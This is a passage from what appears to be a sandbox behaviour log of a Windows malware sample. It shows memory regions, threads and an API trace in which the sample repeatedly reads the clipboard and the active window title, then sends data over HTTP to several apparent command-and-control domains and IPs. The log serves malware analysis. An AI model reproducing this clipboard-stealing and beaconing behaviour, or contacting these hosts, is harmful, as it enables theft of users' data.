"c:\\windows\\system32\\shell32.dll") Region: id = 913 start_va = 0x7feff800000 end_va = 0x7feff929fff monitored = 0 entry_point = 0x7feff8010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 914 start_va = 0x7feff930000 end_va = 0x7feff9cefff monitored = 0 entry_point = 0x7feff9325a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 915 start_va = 0x7feffa00000 end_va = 0x7feffa00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 916 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 917 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 918 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 919 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 920 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 921 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 922 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 923 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 924 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 925 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 926 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 927 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 928 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 929 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 930 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 931 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 932 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 933 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 934 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 935 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 936 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 937 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 938 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 939 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 940 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 941 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 942 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 943 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 944 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 945 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 946 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 947 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 948 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 949 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1105 start_va = 0x7f30000 end_va = 0x9a87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f30000" filename = "" Region: id = 1118 start_va = 0x7940000 end_va = 0x7a4afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007940000" filename = "" Region: id = 1330 start_va = 0x7a50000 end_va = 0x7acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a50000" filename = "" Region: id = 1331 start_va = 0x7fefcec0000 end_va = 0x7fefcf14fff monitored = 0 entry_point = 0x7fefcec1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1332 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1335 start_va = 0x9a90000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a90000" filename = "" Region: id = 1336 start_va = 0x7fefc8c0000 end_va = 0x7fefc8c6fff monitored = 0 entry_point = 0x7fefc8c14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1337 start_va = 0x7fefcd40000 end_va = 0x7fefcd9afff monitored = 0 entry_point = 0x7fefcd46940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1338 start_va = 0x6220000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 1397 start_va = 0x7fef4d10000 end_va = 0x7fef4d17fff monitored = 0 entry_point = 0x7fef4d11414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2021 start_va = 0x7fefaee0000 end_va = 0x7fefaf32fff monitored = 0 entry_point = 0x7fefaee2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2022 start_va = 0x9bc0000 end_va = 0x9d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 2025 start_va = 0x7fefceb0000 end_va = 0x7fefceb6fff monitored = 0 entry_point = 0x7fefceb142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3054 start_va = 0x2530000 end_va = 0x2532fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 3075 start_va = 0x68c0000 end_va = 0x6b7dfff monitored = 0 entry_point = 0x68eb790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 3076 start_va = 0x6980000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006980000" filename = "" Region: id = 3077 start_va = 0x7feff9d0000 end_va = 0x7feff9e6fff monitored = 0 entry_point = 0x7feff9d1070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 3078 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 3079 start_va = 0x7300000 end_va = 0x754ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 3080 start_va = 0x9d80000 end_va = 0xa03dfff monitored = 0 entry_point = 0x9dab790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 7729 start_va = 0x2520000 end_va = 0x2523fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 7730 start_va = 0x7fef0b00000 end_va = 0x7fef0caffff monitored = 0 entry_point = 0x7fef0b01020 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 7731 start_va = 0x2530000 end_va = 0x2530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002530000" filename = "" Region: id = 9548 start_va = 0x25c0000 end_va = 0x25f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 9549 start_va = 0x7fef1320000 end_va = 0x7fef1327fff monitored = 0 entry_point = 0x7fef13211a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9550 start_va = 0x2600000 end_va = 0x26c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 9551 start_va = 0x2600000 end_va = 0x26c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 9552 start_va = 0x2520000 end_va = 0x2520fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 9553 start_va = 0x29a0000 end_va = 0x29b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 9574 start_va = 0x2600000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 9575 start_va = 0x2640000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 9576 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 9579 start_va = 0x2520000 end_va = 0x2523fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 9580 start_va = 0x2540000 end_va = 0x2543fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 9581 start_va = 0x2620000 end_va = 0x2639fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 9588 start_va = 0x2520000 end_va = 0x2524fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 9618 start_va = 0x23a0000 end_va = 0x23d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 9619 start_va = 0x2540000 end_va = 0x2542fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 9620 start_va = 0x2660000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 9621 start_va = 0x9d80000 end_va = 0xa57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d80000" filename = "" Region: id = 9622 start_va = 0x4070000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 9623 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 9624 start_va = 0x2200000 end_va = 0x2200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 9625 start_va = 0x2200000 end_va = 0x2201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 9626 start_va = 0x23e0000 end_va = 0x23e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 9627 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 9628 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Thread: id = 9 os_tid = 0xe58 Thread: id = 10 os_tid = 0xdd0 Thread: id = 11 os_tid = 0xdc8 Thread: id = 12 os_tid = 0xdc0 Thread: id = 13 os_tid = 0xc54 Thread: id = 14 os_tid = 0x9c4 Thread: id = 15 os_tid = 0x2f8 Thread: id = 16 os_tid = 0x398 Thread: id = 17 os_tid = 0x268 Thread: id = 18 os_tid = 0x57c Thread: id = 19 os_tid = 0x588 Thread: id = 20 os_tid = 0x318 Thread: id = 21 os_tid = 0x5d0 Thread: id = 22 os_tid = 0x7dc Thread: id = 23 os_tid = 0x5a4 Thread: id = 24 os_tid = 0x354 Thread: id = 25 os_tid = 0x350 Thread: id = 26 os_tid = 0x53c Thread: id = 27 os_tid = 0x51c Thread: id = 28 os_tid = 0x514 Thread: id = 29 os_tid = 0x510 Thread: id = 30 os_tid = 0x478 Thread: id = 31 os_tid = 0x5d8 Thread: id = 32 os_tid = 0x55c Thread: id = 33 os_tid = 0x540 Thread: id = 34 os_tid = 0x534 Thread: id = 35 os_tid = 0x52c Thread: id = 36 os_tid = 0x518 Thread: id = 37 os_tid = 0x50c Thread: id = 38 os_tid = 0x4f0 Thread: id = 39 os_tid = 0x4d4 Thread: id = 40 os_tid = 0x4cc Thread: id = 41 os_tid = 0x4bc Thread: id = 42 os_tid = 0x474 Thread: id = 43 os_tid = 0x460 [0077.175] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\nbtstat.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12f478*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f450, hNewToken=0x0 | out: lpProcessInformation=0x12f450*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0), hNewToken=0x0) returned 0 [0077.269] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\rundll32.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12f478*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f450, hNewToken=0x0 | out: lpProcessInformation=0x12f450*(hProcess=0x850, hThread=0x290, dwProcessId=0xfa0, dwThreadId=0xfa4), hNewToken=0x0) returned 1 [0102.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x12f0f0 | out: HeapArray=0x12f0f0*=0x300000) returned 0xd [0102.390] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x3da0) returned 0x7c5ee90 [0102.400] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12eed0 | out: Value="kEecfMwgj") returned 0x0 [0102.448] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x12f0f0 | out: HeapArray=0x12f0f0*=0x300000) returned 0xd [0102.454] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x4000) returned 0x7d8ea00 [0102.528] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12ec50 | out: Value="kEecfMwgj") returned 0x0 [0102.536] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x12ef50 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0102.814] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x12ef2e, cbSize=0x12ef00 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x12ef00) returned 0x0 [0105.409] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x12f300 | out: lpWSAData=0x12f300) returned 0 [0105.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x79c57d5, lpParameter=0x79ca646, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdc0 Thread: id = 50 os_tid = 0xfd0 [0105.435] Sleep (dwMilliseconds=0x1388) [0110.596] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.597] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0110.614] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0110.627] GetForegroundWindow () returned 0x1029a [0110.627] GetWindowTextW (in: hWnd=0x1029a, lpString=0x79ce2b2, nMaxCount=260 | out: lpString="Rise Entire") returned 11 [0110.628] GlobalUnlock (hMem=0x3b59e0) returned 1 [0110.628] CloseClipboard () returned 1 [0110.629] socket (af=2, type=1, protocol=6) returned 0x3e0 [0110.720] getaddrinfo (in: pNodeName="www.reemletenleafy.com", pServiceName="80", pHints=0x7c5eed8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5ef08 | out: ppResult=0x7c5ef08*=0x0) returned 11001 [0111.578] getaddrinfo (in: pNodeName="www.reemletenleafy.com", pServiceName="80", pHints=0x7c5eed8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5ef08 | out: ppResult=0x7c5ef08*=0x0) returned 11001 [0111.579] Sleep (dwMilliseconds=0x1388) [0116.701] OpenClipboard (hWndNewOwner=0x0) returned 1 [0116.701] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0116.701] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0116.712] GlobalUnlock (hMem=0x3b59e0) returned 1 [0116.712] CloseClipboard () returned 1 [0116.733] socket (af=2, type=1, protocol=6) returned 0x1028 [0116.734] getaddrinfo (in: pNodeName="www.esomvw.com", pServiceName="80", pHints=0x7c5f278*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5f2a8 | out: ppResult=0x7c5f2a8*=0x7c35a00*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x24cf6b0*(sa_family=2, sin_port=0x50, sin_addr="104.18.26.58"), ai_next=0x7c35700*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x24cf710*(sa_family=2, sin_port=0x50, sin_addr="104.18.27.58"), ai_next=0x0))) returned 0 [0117.203] htons (hostshort=0x50) returned 0x5000 [0117.203] connect (s=0x1028, name=0x24cf6b0*(sa_family=2, sin_port=0x50, sin_addr="104.18.26.58"), namelen=16) returned 0 [0117.249] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0117.250] send (s=0x1028, buf=0x79d6f32*, len=754, flags=0) returned 754 [0117.250] closesocket (s=0x1028) returned 0 [0117.251] socket (af=2, type=1, protocol=6) returned 0x1028 [0117.251] connect (s=0x1028, name=0x24cf6b0*(sa_family=2, sin_port=0x50, sin_addr="104.18.26.58"), namelen=16) returned 0 [0117.273] send (s=0x1028, buf=0x79f4332*, len=168, flags=0) returned 168 [0117.274] setsockopt (s=0x1028, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0117.274] recv (in: s=0x1028, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 812 [0117.334] closesocket (s=0x1028) returned 0 [0117.335] Sleep (dwMilliseconds=0x1388) [0122.335] OpenClipboard (hWndNewOwner=0x0) returned 1 [0122.336] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0122.336] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0122.336] GetForegroundWindow () returned 0x1029a [0122.336] GetWindowTextW (in: hWnd=0x1029a, lpString=0x79ce2b2, nMaxCount=260 | out: lpString="Rise Entire") returned 11 [0122.336] GlobalUnlock (hMem=0x3b59e0) returned 1 [0122.336] CloseClipboard () returned 1 [0122.336] Sleep (dwMilliseconds=0x1388) [0127.543] OpenClipboard (hWndNewOwner=0x0) returned 1 [0127.543] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0127.543] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0127.551] GlobalUnlock (hMem=0x3b59e0) returned 1 [0127.551] CloseClipboard () returned 1 [0127.559] socket (af=2, type=1, protocol=6) returned 0xaf4 [0127.560] getaddrinfo (in: pNodeName="www.deskbk.com", pServiceName="80", pHints=0x7c5f9b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5f9e8 | out: ppResult=0x7c5f9e8*=0x3e7b340*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3ea8260*(sa_family=2, sin_port=0x50, sin_addr="156.226.250.168"), ai_next=0x0)) returned 0 [0128.032] connect (s=0xaf4, name=0x3ea8260*(sa_family=2, sin_port=0x50, sin_addr="156.226.250.168"), namelen=16) returned 0 [0131.350] RtlIntegerToChar (in: Value=0x1d4, Base=0x0, Length=0x8, String=0x7acf848 | out: String="468") returned 0x0 [0131.350] send (s=0xaf4, buf=0x79d6f32*, len=966, flags=0) returned 966 [0131.351] closesocket (s=0xaf4) returned 0 [0131.390] socket (af=2, type=1, protocol=6) returned 0xaf4 [0131.391] connect (s=0xaf4, name=0x3ea8260*(sa_family=2, sin_port=0x50, sin_addr="156.226.250.168"), namelen=16) returned 0 [0131.661] send (s=0xaf4, buf=0x79f4332*, len=168, flags=0) returned 168 [0131.661] setsockopt (s=0xaf4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0131.661] recv (in: s=0xaf4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c) returned -1 [0132.719] closesocket (s=0xaf4) returned 0 [0132.720] Sleep (dwMilliseconds=0x1388) [0132.777] OpenClipboard (hWndNewOwner=0x0) returned 1 [0132.777] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0132.777] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0132.777] GetForegroundWindow () returned 0x1029a [0132.777] GetWindowTextW (in: hWnd=0x1029a, lpString=0x79ce2b2, nMaxCount=260 | out: lpString="Rise Entire") returned 11 [0132.811] GlobalUnlock (hMem=0x3b59e0) returned 1 [0132.811] CloseClipboard () returned 1 [0132.812] socket (af=2, type=1, protocol=6) returned 0xaf4 [0132.812] getaddrinfo (in: pNodeName="www.anielleharris.com", pServiceName="80", pHints=0x7c5fd58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5fd88 | out: ppResult=0x7c5fd88*=0x7c32000*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3ea87a0*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), ai_next=0x0)) returned 0 [0132.828] connect (s=0xaf4, name=0x3ea87a0*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), namelen=16) returned 0 [0132.846] RtlIntegerToChar (in: Value=0x2a8, Base=0x0, Length=0x8, String=0x7acf848 | out: String="680") returned 0x0 [0132.846] send (s=0xaf4, buf=0x79d6f32*, len=1203, flags=0) returned 1203 [0132.846] closesocket (s=0xaf4) returned 0 [0132.846] socket (af=2, type=1, protocol=6) returned 0xaf4 [0132.847] connect (s=0xaf4, name=0x3ea87a0*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), namelen=16) returned 0 [0132.871] send (s=0xaf4, buf=0x79f4332*, len=175, flags=0) returned 175 [0132.871] setsockopt (s=0xaf4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0132.871] recv (in: s=0xaf4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 5770 [0132.962] closesocket (s=0xaf4) returned 0 [0132.962] Sleep (dwMilliseconds=0x1388) [0132.975] OpenClipboard (hWndNewOwner=0x0) returned 1 [0132.975] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0132.975] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0132.975] GlobalUnlock (hMem=0x3b59e0) returned 1 [0132.975] CloseClipboard () returned 1 [0132.975] socket (af=2, type=1, protocol=6) returned 0xaf4 [0132.975] getaddrinfo (in: pNodeName="www.lightfootsteps.com", pServiceName="80", pHints=0x7c600f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60128 | out: ppResult=0x7c60128*=0x7c31e40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, 